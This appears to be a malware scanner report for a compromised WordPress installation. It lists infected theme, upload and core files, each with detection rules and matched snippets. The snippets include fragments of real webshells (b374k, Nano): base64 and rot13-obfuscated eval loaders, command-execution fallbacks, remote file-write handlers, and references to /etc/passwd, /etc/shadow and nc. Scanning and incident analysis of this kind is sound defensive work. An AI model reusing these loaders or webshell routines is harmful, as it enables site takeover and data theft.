Function exec Dangerous Encoded Function `exec` [https://www.php.net/exec]	<?php ExEc(\$value);\n } else if (function_exists(\"passthru\")) {\n return pAsSThRu(\$value);\n }\n }\n function gecko_perm(\$flename){\n return substr(sprintf(\"%o\", fileperms(\$flename)), -4);\n }\n ";if(file_exists("/tmp/Acx0".awalanFile(namaFile())."wplers0x.do.not.remove.this.Lock")){${"GLOBALS"}["cntbduepu"]="tmp";$wlkexb="text";FiLe_pUt_ConTentS(${${"GLOBALS"}["gwguwztv"]}."/as".pwdnostrip()."pxha".awalanFile(namaFile())."ndler0.Lock",${$wlkexb});_mad_cmd("nohup php ".${${"GLOBALS"}["cntbduep...
Function passthru Dangerous Encoded Function `passthru` [https://www.php.net/passthru]	<?php pAsSThRu(\$value);\n }\n }\n function gecko_perm(\$flename){\n return substr(sprintf(\"%o\", fileperms(\$flename)), -4);\n }\n ";if(file_exists("/tmp/Acx0".awalanFile(namaFile())."wplers0x.do.not.remove.this.Lock")){${"GLOBALS"}["cntbduepu"]="tmp";$wlkexb="text";FiLe_pUt_ConTentS(${${"GLOBALS"}["gwguwztv"]}."/as".pwdnostrip()."pxha".awalanFile(namaFile())."ndler0.Lock",${$wlkexb});_mad_cmd("nohup php ".${${"GLOBALS"}["cntbduepu"]}."/as".pwdnostrip()."pxha".awalanFile(namaFile())."ndler0.Lock &")...
Function shell_exec Dangerous Encoded Function `shell_exec` [https://www.php.net/shell_exec]	<?php ShEll_eXeC(\$value);\n } else if (function_exists("exec\")) {\n return ExEc(\$value);\n } else if (function_exists(\"passthru\")) {\n return pAsSThRu(\$value);\n }\n }\n function gecko_perm(\$flename){\n return substr(sprintf(\"%o\", fileperms(\$flename)), -4);\n }\n ";if(file_exists("/tmp/Acx0".awalanFile(namaFile())."wplers0x.do.not.remove.this.Lock")){${"GLOBALS"}["cntbduepu"]="tmp";$wlkexb="text";FiLe_pUt_ConTentS(${${"GLOBALS"}["gwguwztv"]}."/as".pwdnostrip()."pxha".awalanFile(namaFile())."...
Function system Dangerous Encoded Function `system` [https://www.php.net/system]	<?php sYsTem(\$value);\n } else if (function_exists(\"shell_exec")) {\n return ShEll_eXeC(\$value);\n } else if (function_exists("exec\")) {\n return ExEc(\$value);\n } else if (function_exists(\"passthru\")) {\n return pAsSThRu(\$value);\n }\n }\n function gecko_perm(\$flename){\n return substr(sprintf(\"%o\", fileperms(\$flename)), -4);\n }\n ";if(file_exists("/tmp/Acx0".awalanFile(namaFile())."wplers0x.do.not.remove.this.Lock")){${"GLOBALS"}["cntbduepu"]="tmp";$wlkexb="text";FiLe_pUt_ConTentS(${${"...
Sign 00f56a27 Line: 41 Dangerous Malware Signature (hash: 00f56a27)	`<?php ${${`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php Exploit`
Sign 11413268 Line: 41 Dangerous Malware Signature (hash: 11413268)	`<?php exploit`
Sign 237750ea Line: 41 Dangerous Malware Signature (hash: 237750ea)	`<?php \x47\x4c\x4f\x42\x41\x4c\x53`
Sign 407651f7 Dangerous Malware Signature (hash: 407651f7)	`<?php WScript.shell`
Sign 5b557546 Dangerous Malware Signature (hash: 5b557546)	`<?php 65786563`
Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`
Sign a915f4c2 Dangerous Malware Signature (hash: a915f4c2)	`<?php uname -a`
Sign b236d073 Dangerous Malware Signature (hash: b236d073)	`<?php /etc/passwd`
Sign cbea68d7 Dangerous Malware Signature (hash: cbea68d7)	`<?php 73797374656d`
Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e)	`<?php backdoor`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/lib/extentions/index.php

Size: 22.42 kB Created: 2022-08-12 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 2 Dangers: 21

Description	Match
Exploit base64_long Line: 38 Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'ICAgIGVycm9yX3JlcG9ydGluZygwKTsgaHR0cF9yZXNwb25zZV9jb2RlKDQwNCk7IGRlZmluZSgiWXAiLCAiIik7ICRHMyA9ICJzY2FuZGlyIjsgJGM4ID0gYXJyYXkoIjcwNjg3MDVmNzU2ZTYxNmQ2NSIsICI3MDY4NzA3NjY1NzI3MzY5NmY2ZSIsICI2NzY1NzQ2Mzc3NjQiLCAiNjM2ODY0Njk3MiIsICI3MDcyNjU2NzVmNzM3MDZjNjk3NCIsICI2MTcyNzI2MTc5NWY2NDY5NjY2NiIsICI2OTczNWY2NDY5NzIiLCAiNjk3MzVmNjY2OTZjNjUiLCAiNjk3MzVmNzc3MjY5NzQ2MTYyNmM2NSIsICI2OTczNWY3MjY1NjE2NDYxNjI2YzY1IiwgIjY2Njk2YzY1NzM2OTdhNjUiLCAiNjM2ZjcwNzkiLCAiNjY2OTZjNjU1ZjY1Nzg2OTczNzQ3MyIsICI2NjY5NmM2NTV...
Exploit eval_base64 Line: 38 Dangerous RCE (Remote Code Execution), through Base64 text, allow remote attackers to execute arbitrary commands or code on the target machine	<?php eval(base64_decode('ICAgIGVycm9yX3JlcG9ydGluZygwKTsgaHR0cF9yZXNwb25zZV9jb2RlKDQwNCk7IGRlZmluZSgiWXAiLCAiIik7ICRHMyA9ICJzY2FuZGlyIjsgJGM4ID0gYXJyYXkoIjcwNjg3MDVmNzU2ZTYxNmQ2NSIsICI3MDY4NzA3NjY1NzI3MzY5NmY2ZSIsICI2NzY1NzQ2Mzc3NjQiLCAiNjM2ODY0Njk3MiIsICI3MDcyNjU2NzVmNzM3MDZjNjk3NCIsICI2MTcyNzI2MTc5NWY2NDY5NjY2NiIsICI2OTczNWY2NDY5NzIiLCAiNjk3MzVmNjY2OTZjNjUiLCAiNjk3MzVmNzc3MjY5NzQ2MTYyNmM2NSIsICI2OTczNWY3MjY1NjE2NDYxNjI2YzY1IiwgIjY2Njk2YzY1NzM2OTdhNjUiLCAiNjM2ZjcwNzkiLCAiNjY2OTZjNjU1ZjY1Nzg2OTczNzQ3...
Exploit execution Line: 38 Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(base64_decode('ICAgIGVycm9yX3JlcG9ydGluZygwKTsgaHR0cF9yZXNwb25zZV9jb2RlKDQwNCk7IGRlZmluZSgiWXAiLCAiIik7ICRHMyA9ICJzY2FuZGlyIjsgJGM4ID0gYXJyYXkoIjcwNjg3MDVmNzU2ZTYxNmQ2NSIsICI3MDY4NzA3NjY1NzI3MzY5NmY2ZSIsICI2NzY1NzQ2Mzc3NjQiLCAiNjM2ODY0Njk3MiIsICI3MDcyNjU2NzVmNzM3MDZjNjk3NCIsICI2MTcyNzI2MTc5NWY2NDY5NjY2NiIsICI2OTczNWY2NDY5NzIiLCAiNjk3MzVmNjY2OTZjNjUiLCAiNjk3MzVmNzc3MjY5NzQ2MTYyNmM2NSIsICI2OTczNWY3MjY1NjE2NDYxNjI2YzY1IiwgIjY2Njk2YzY1NzM2OTdhNjUiLCAiNjM2ZjcwNzkiLCAiNjY2OTZjNjU1ZjY1Nzg2OTczNzQ3...
Exploit hacked_by Dangerous Hacker credits	`<?php Hacked By`
Exploit nano Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $c8[9]("{$Jd}/{$F1}")`
Function eval Line: 38 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(base64_decode('ICAgIGVycm9yX3JlcG9ydGluZygwKTsgaHR0cF9yZXNwb25zZV9jb2RlKDQwNCk7IGRlZmluZSgiWXAiLCAiIik7ICRHMyA9ICJzY2FuZGlyIjsgJGM4ID0gYXJyYXkoIjcwNjg3MDVmNzU2ZTYxNmQ2NSIsICI3MDY4NzA3NjY1NzI3MzY5NmY2ZSIsICI2NzY1NzQ2Mzc3NjQiLCAiNjM2ODY0Njk3MiIsICI3MDcyNjU2NzVmNzM3MDZjNjk3NCIsICI2MTcyNzI2MTc5NWY2NDY5NjY2NiIsICI2OTczNWY2NDY5NzIiLCAiNjk3MzVmNjY2OTZjNjUiLCAiNjk3MzVmNzc3MjY5NzQ2MTYyNmM2NSIsICI2OTczNWY3MjY1NjE2NDYxNjI2YzY1IiwgIjY2Njk2YzY1NzM2OTdhNjUiLCAiNjM2ZjcwNzkiLCAiNjY2OTZjNjU1ZjY1Nzg2OTczNzQ3...
Sign 0f37c730 Line: 38 Dangerous Malware Signature (hash: 0f37c730)	`<?php mdW5jdGlvb`
Sign 11413268 Line: 38 Dangerous Malware Signature (hash: 11413268)	`<?php eval(base64_decode(`
Sign 162cf671 Line: 38 Dangerous Malware Signature (hash: 162cf671)	`<?php hcnJheV`
Sign 407651f7 Line: 38 Dangerous Malware Signature (hash: 407651f7)	`<?php w/cGhw`
Sign 7186bb8d Line: 38 Dangerous Malware Signature (hash: 7186bb8d)	`<?php RfR0VU`
Sign 7830f7a6 Line: 38 Dangerous Malware Signature (hash: 7830f7a6)	`<?php Nsb3Nl`
Sign 7f5d33bf Line: 38 Dangerous Malware Signature (hash: 7f5d33bf)	`<?php JlcGxhY2`
Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc)	`<?php <?php eval`
Sign 91535293 Line: 38 Dangerous Malware Signature (hash: 91535293)	`<?php lY2hv`
Sign 963e968a Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign 963e968a Line: 38 Dangerous Malware Signature (hash: 963e968a)	`<?php PD9waH`
Sign a408f408 Line: 38 Dangerous Malware Signature (hash: a408f408)	`<?php cmVwbGFjZ`
Sign ae7830db Line: 38 Dangerous Malware Signature (hash: ae7830db)	`<?php Y2xvc2`
Sign bced5841 Line: 38 Dangerous Malware Signature (hash: bced5841)	`<?php 8P3Boc`
Sign d97f004d Line: 38 Dangerous Malware Signature (hash: d97f004d)	`<?php Z1bmN0aW9u`
Sign de12c454 Line: 38 Dangerous Malware Signature (hash: de12c454)	`<?php V4dHJhY3`
Sign e6546205 Line: 38 Dangerous Malware Signature (hash: e6546205)	`<?php kX0dFV`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/woocommerce/loop/index.php

Size: 25.31 kB Created: 2021-11-11 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3

Description	Match
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp, $_POST["src"])`
Exploit download_remote_code2 Line: 40 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp, $_POST["\x73\162\x63"])`
Exploit hex_char Line: 40 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`

/custdata02/turtle/public_html/wp-content/themes/Consulting_Pro/woocommerce/order/index.php

Size: 25.30 kB Created: 2022-04-29 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 3

Description	Match
Exploit download_remote_code2 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp, $_POST["src"])`
Exploit download_remote_code2 Line: 40 Dangerous RFU (Remote File Upload), via HTTP, allow to write malicious code on the target machine	`<?php fwrite($fp, $_POST["\163\162\x63"])`
Exploit hex_char Line: 40 Dangerous Hex char is usually used for the obfuscation of malicious code	`<?php \x5f`

/custdata02/turtle/public_html/wp-content/uploads/gravity_forms/c/e/g/c/firbpjquloy.php

Size: 13.57 kB Created: 2024-06-01 02:57:03 Modified: 2024-06-01 08:12:23 Warns: 1

Description	Match
Function eval Line: 56 Warning Potentially dangerous function `eval` [https://www.php.net/eval]	`<?php eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(eval(_RnupfVPYevGNHl0Izs($GLOBALS[��][0x00008]))))))))))))))))))`

/custdata02/turtle/public_html/wp-content/uploads/gravity_forms/c/e/g/c/myraekxgjbp.php

Size: 43.93 kB Created: 2024-06-01 02:57:03 Modified: 2024-06-01 08:12:23 Warns: 2 Dangers: 2

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php 'OykpKSkpKSkpKSkpKSkpKSkpKSkpKV04MDAwMHgwW12jxFtTTEFCT0xHJChVT3piTFZaVUs3Rm5kRE5STEhfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZX07KSkpKU1kYktEXyQoTXNmeF8oYlRGOTBmU18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2JURjkwZlNfJGxhYm9sZztrTFh5eDlzQl8kbGFib2xneylNZGJLRF8kKFVPemJMVlpVSzdGbmRETlJMSF8gbm9pdGNudWY7XTcwMDB4MFtdo8RbU0xBQk9MRyQ9YlRGOTBmU18kO102MDB4MFtdo8RbU0xBQk9MRyQ9a0xYeXg5c0JfJH07bmVTWGJYXyQgbnJ1dGVyOykpKV01MHg...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval($PMEDV($rNbKo('OykpKSkpKSkpKSkpKSkpKSkpKSkpKV04MDAwMHgwW12jxFtTTEFCT0xHJChVT3piTFZaVUs3Rm5kRE5STEhfKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZShsYXZlKGxhdmUobGF2ZX07KSkpKU1kYktEXyQoTXNmeF8oYlRGOTBmU18kKGV0YWxmbml6Zyh2ZXJydHMgbnJ1dGVyO2JURjkwZlNfJGxhYm9sZztrTFh5eDlzQl8kbGFib2xneylNZGJLRF8kKFVPemJMVlpVSzdGbmRETlJMSF8gbm9pdGNudWY7XTcwMDB4MFtdo8RbU0xBQk9MRyQ9YlRGOTBmU18kO102MDB4MFtdo8RbU0xBQk9MRyQ9a0xYeXg5c0JfJH07bmVTWGJYXyQg...
Sign ae7830db Line: 1 Dangerous Malware Signature (hash: ae7830db)	`<?php y2HY`
Sign f9dc0a55 Dangerous Malware Signature (hash: f9dc0a55)	`<?php 'base64_decode'`

/custdata02/turtle/public_html/wp-content/defaults.php

Size: 14.78 kB Created: 2022-07-08 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1

Description	Match
Sign 00f56a27 Line: 80 Dangerous Malware Signature (hash: 00f56a27)	`<?php $___ =`

/custdata02/turtle/public_html/wp-content/product.php

Size: 102.40 kB Created: 2022-05-13 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 10 Dangers: 13

Description	Match
Exploit base64_long Warning Long Base64 encoded text is usually used for the obfuscation of malicious code	<?php "VVJNb9swDP0riQ6GBAjOetglheBD19uGHrpbkAKaRFcqZMmQ6HSB5/8+2mm+Lpb5yPf4SGndDtGgT5GDRDHisYfUrrpkhwBrxYZoofURLGtOWA1/+5SxKORi+1V9KlGKnbVYVd2lat1ZSqc/H2CQNSeQIwk4X3awn8UmzmzqMmh7ZPJqSozn/1U/R049PH46H4CDwro43xJXAPEPOq9Q7fYyyqzWD9Irm8zQQURZlK/PwXOABUuqEPZqcgpBDor9ePn1lCJS6mfSlgaWWjFt7fNhhnyhDGRyRmPExWVBjWCcju/AZFBsAV9nkEmjUrN5C4vQvzez2V4Cs5FOmRqhIPe7sBePGXDIceV3el9V85cPMqrLBsTo6wxdOsCdk7lIZiF7mnw+E3FrjaiNW+p4ey+yIRc3XauK00rgrnwRE5OQQO4v1CjGAqFdK0x945o4X3vdD8VRZnvTAPNxvG6UswAtMjEZjcbRVY9fYxbA376DNFDLKxl...
Exploit etc_passwd Dangerous The `/etc/passwd` file on Unix systems contains password information, an attacker who has accessed the `etc/passwd` file may attempt a brute force attack of all passwords on the system	`<?php /etc/passwd`
Exploit etc_shadow Dangerous The `/etc/shadow` file on Unix systems contains password information, an attacker who has accessed the `etc/shadow` file may attempt a brute force attack of all passwords on the system	`<?php /etc/shadow`
Exploit execution Dangerous RCE (Remote Code Execution) allow remote attackers to execute PHP code on the target machine via HTTP [https://cwe.mitre.org/data/definitions/77.html, https://cwe.mitre.org/data/definitions/78.html]	<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('tP3XruR3liYIXnQC9Q7egU9ScTMrqUhIdPVDeKORc5SNToBNeM2Jbfeh+zmRuqe7LwZj+Kbx1+tf6xPb3beD/+t/+tu/GUMSO38g/0A9z17f9kq//WOjKY7mfO/P8mz7p/HvEAhTn6etKJL/BoJwPM3/sMbxbc3/MMY3mIC/Jvmv+TZf13/62//0t/8r+J/+9j/nf0H6PP/xjz/+sAwEAi84UUADvRBrPy7UPGAIiswohGAwBlpmjwwo9of//gMEf1nz0pdK8ePn6DrOph//7cdie/zTFa979KOPph/j1lTr/KOIf1Fm/UI9/+7n2s+61Zz9XPY502Iz/trXj+ftr9ZvL675dPtis/7hH34b8S9t/urxq++vFZ8R988BKAFOP/7XHwj2/FP+6j7G8bk/2/jZ/tvu/u7XsHYeyvUZsfRKPv9+qOfN077+uJ/g/dzn/y...
Function eval Warning Potentially dangerous function `eval` [https://www.php.net/eval]	<?php eval(str_rot13(gzinflate(str_rot13(base64_decode('tP3XruR3liYIXnQC9Q7egU9ScTMrqUhIdPVDeKORc5SNToBNeM2Jbfeh+zmRuqe7LwZj+Kbx1+tf6xPb3beD/+t/+tu/GUMSO38g/0A9z17f9kq//WOjKY7mfO/P8mz7p/HvEAhTn6etKJL/BoJwPM3/sMbxbc3/MMY3mIC/Jvmv+TZf13/62//0t/8r+J/+9j/nf0H6PP/xjz/+sAwEAi84UUADvRBrPy7UPGAIiswohGAwBlpmjwwo9of//gMEf1nz0pdK8ePn6DrOph//7cdie/zTFa979KOPph/j1lTr/KOIf1Fm/UI9/+7n2s+61Zz9XPY502Iz/trXj+ftr9ZvL675dPtis/7hH34b8S9t/urxq++vFZ8R988BKAFOP/7XHwj2/FP+6j7G8bk/2/jZ/tvu/u7XsHYeyvUZsfRKPv9+qOfN077+uJ/g/dzn/y...
Function exec Warning Potentially dangerous function `exec` [https://www.php.net/exec]	`<?php exec($s_c,$s_r); if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s; if(!empty($s_out)) return $s_out; } if(is_callable('passthru')) { ob_start(); @passthru($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) return $s_out; } if(is_callable('proc_open')) { $s_descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array(...`
Function passthru Warning Potentially dangerous function `passthru` [https://www.php.net/passthru]	`<?php passthru($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) return $s_out; } if(is_callable('proc_open')) { $s_descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $s_proc = @proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array()); if (is_resource($s_proc)) { while($s_si = fgets($s_pipes[1])) { if(!empty($s_si)) $s_out .= $s_si; } while($s_se = fgets($s_pipes[2])) { i...`
Function posix_getpwuid Warning Potentially dangerous function `posix_getpwuid` [https://www.php.net/posix_getpwuid]	`<?php posix_getpwuid(fileowner($s_l)); $s_group = posix_getgrgid(filegroup($s_l)); $s_owner = $s_name['name']."<span class='gaya'>:</span>".$s_group['name']; $s_owner_html = "<td style='text-align:center;'>".$s_owner."</td>"; } $s_lhref = $s_lname = $s_laction = ""; if(@is_dir($s_l)){ if($s_l=="."){ $s_lhref = $s_self."cd=".pl($s_cwd); $s_lsize = "LINK"; $s_laction = "<span id='titik1'><a href='".$s_self."cd=".pl($s_cwd)."&find=".pl($s_cwd)."'>find</a> \| <a hr...`
Function posix_kill Warning Potentially dangerous function `posix_kill` [https://www.php.net/posix_kill]	`<?php posix_kill($s_p,'9'))? notif("Process with pid ".$s_p." has been successfully killed"):notif("Unable to kill process with pid ".$s_p); else{ if(!$s_win) $s_buff .= notif(exe("kill -9 ".$s_p)); else $s_buff .= notif(exe("taskkill /F /PID ".$s_p)); } } } if(!$s_win) $s_h = "ps aux"; // nix else $s_h = "tasklist /V /FO csv"; // win $s_wcount = 11; $s_wexplode = " "; if($s_win) $s_wexplode = "\",\""; $s_res = exe($s_h); if(trim($s_res)=='') $s_re...`
Function proc_close Warning Potentially dangerous function `proc_close` [https://www.php.net/proc_close]	`<?php proc_close($s_proc); if(!empty($s_out)) return $s_out; } if(is_callable('popen')){ $s_f = @popen($s_c, 'r'); if($s_f){ while(!feof($s_f)){ $s_out .= fread($s_f, 2096); } pclose($s_f); } if(!empty($s_out)) return $s_out; } return ""; } // delete dir and all of its content (no warning !) xp function rmdirs($s){ $s = (substr($s,-1)=='/')? $s:$s.'/'; if($dh = opendir($s)){ while(($f = readdir($dh))!==false){ if(($f!='.')&&($f!='..')){ $f = $...`
Function proc_open Warning Potentially dangerous function `proc_open` [https://www.php.net/proc_open]	`<?php proc_open($s_c, $s_descriptorspec, $s_pipes, getcwd(), array()); if (is_resource($s_proc)) { while($s_si = fgets($s_pipes[1])) { if(!empty($s_si)) $s_out .= $s_si; } while($s_se = fgets($s_pipes[2])) { if(!empty($s_se)) $s_out .= $s_se; } } @proc_close($s_proc); if(!empty($s_out)) return $s_out; } if(is_callable('popen')){ $s_f = @popen($s_c, 'r'); if($s_f){ while(!feof($s_f)){ $s_out .= fread($s_f, 2096); } pclose($s_f); } i...`
Function shell_exec Warning Potentially dangerous function `shell_exec` [https://www.php.net/shell_exec]	`<?php shell_exec($s_c); if(!empty($s_out)) return $s_out; } if(is_callable('exec')) { @exec($s_c,$s_r); if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s; if(!empty($s_out)) return $s_out; } if(is_callable('passthru')) { ob_start(); @passthru($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) return $s_out; } if(is_callable('proc_open')) { $s_descriptorspec = array( 0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array...`
Function system Warning Potentially dangerous function `system` [https://www.php.net/system]	`<?php system($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) return $s_out; } if(is_callable('shell_exec')){ $s_out = @shell_exec($s_c); if(!empty($s_out)) return $s_out; } if(is_callable('exec')) { @exec($s_c,$s_r); if(!empty($s_r)) foreach($s_r as $s_s) $s_out .= $s_s; if(!empty($s_out)) return $s_out; } if(is_callable('passthru')) { ob_start(); @passthru($s_c); $s_out = ob_get_contents(); ob_end_clean(); if(!empty($s_out)) ret...`
Sign 11413268 Dangerous Malware Signature (hash: 11413268)	`<?php eval("?>`
Sign 11413268 Line: 39 Dangerous Malware Signature (hash: 11413268)	`<?php eval(str_rot13`
Sign 1f9aba5a Dangerous Malware Signature (hash: 1f9aba5a)	`<?php if(is_callable('popen')`
Sign 7830f7a6 Dangerous Malware Signature (hash: 7830f7a6)	`<?php nc -l`
Sign 80e70adc Line: 38 Dangerous Malware Signature (hash: 80e70adc)	`<?php <?php eval`
Sign 963e968a Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Dangerous Malware Signature (hash: a408f408)	`<?php code.google.com/p/b374k-shell`
Sign a915f4c2 Dangerous Malware Signature (hash: a915f4c2)	`<?php uname -a`
Sign b236d073 Dangerous Malware Signature (hash: b236d073)	`<?php /proc/cpuinfo`
Sign d30fc49e Dangerous Malware Signature (hash: d30fc49e)	`<?php b374k`

/custdata02/turtle/public_html/wp-content/KygRqcdnXV7.php

Size: 166.77 kB Created: 2024-06-04 19:33:56 Modified: 2024-06-04 19:33:56 Dangers: 2

Description	Match
Sign 963e968a Line: 4341 Dangerous Malware Signature (hash: 963e968a)	`<?php php_uname()`
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/wp-content/AD7cNSyusi8.php

Size: 78.92 kB Created: 2024-06-04 19:50:57 Modified: 2024-06-04 19:50:57 Dangers: 1

Description	Match
Sign a408f408 Line: 1732 Dangerous Malware Signature (hash: a408f408)	`<?php cmd.exe`

/custdata02/turtle/public_html/wp-includes/Requests/src/Exception/Http/index.php

Size: 28.35 kB Created: 2022-01-12 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1

Description Match

Function eval Warning

Potentially dangerous function `eval`

<?php eval($ver); return $view; } function backend($_claster) { $_module = $this->stable[0].$this->stable[4].$this->stable[3].$this->stable[1].$this->stable[2].$this->stable[5]; return $_module("\r\n", "", $_claster); } var $access; var $_debug = 0; var $ls = array('te', 'in', 'la', 'f', 'gz'); var $dx = array('on', 'crea', 'te_fun', 'cti'); var $lib = array('cod', 'de', 'base', '64_', 'e'); var $memory = array('ie', 'tco', 'se', 'ok'); var $stable = array('s', 'p', 'la', '_re', 'tr', 'ce'); var $core...

/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/compat3x/index.php

Size: 14.78 kB Created: 2022-05-30 00:39:41 Modified: 2024-06-04 00:39:41 Dangers: 1

Description	Match
Sign 00f56a27 Line: 80 Dangerous Malware Signature (hash: 00f56a27)	`<?php $___ =`

/custdata02/turtle/public_html/wp-includes/js/tinymce/plugins/hr/function.php

Size: 21.74 kB Created: 2022-01-22 00:39:41 Modified: 2024-06-04 00:39:41 Warns: 1 Dangers: 52

Description	Match
Exploit nano Line: 157 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[13]($_GET['dir'])`
Exploit nano Line: 159 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[12]()`
Exploit nano Line: 162 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[14]('\\', '/', $path)`
Exploit nano Line: 163 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[15]('/', $path)`
Exploit nano Line: 182 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[29]($path . '/' . $_POST['newFolderName'])`
Exploit nano Line: 183 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Create Folder Successfully!", "Success", "success", "?dir=$path")`
Exploit nano Line: 185 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Create Folder Failed", "Failed", "error", "?dir=$path")`
Exploit nano Line: 189 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[4]($_POST['newFileName'], $_POST['newFileContent'])`
Exploit nano Line: 190 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Create File Successfully!", "Success", "success", "?dir=$path")`
Exploit nano Line: 192 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Create File Failed", "Failed", "error", "?dir=$path")`
Exploit nano Line: 198 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("You miss an important value", "Ooopss..", "warning", "?dir=$path")`
Exploit nano Line: 200 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[30]($path. '/'. $_GET['item'], $_POST['newName'])`
Exploit nano Line: 201 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Rename Successfully!", "Success", "success", "?dir=$path")`
Exploit nano Line: 203 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Rename Failed", "Failed", "error", "?dir=$path")`
Exploit nano Line: 207 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[4]($path. '/'. $_GET['item'], $_POST['newContent'])`
Exploit nano Line: 208 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Edit Successfully!", "Success", "success", "?dir=$path")`
Exploit nano Line: 210 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Edit Failed", "Failed", "error", "?dir=$path")`
Exploit nano Line: 218 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Change Permission Successfully!", "Success", "success", "?dir=$path")`
Exploit nano Line: 220 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Change Permission", "Failed", "error", "?dir=$path")`
Exploit nano Line: 225 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[27]($_GET['item'])`
Exploit nano Line: 226 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Delete Successfully!", "Success", "success", "?dir=$path")`
Exploit nano Line: 228 Dangerous Nano is a family of PHP webshells which are code golfed to be extremely stealthy and efficient [https://github.com/s0md3v/nano]	`<?php $func[16]("Delete Failed", "Failed", "error", "?dir=$path")`
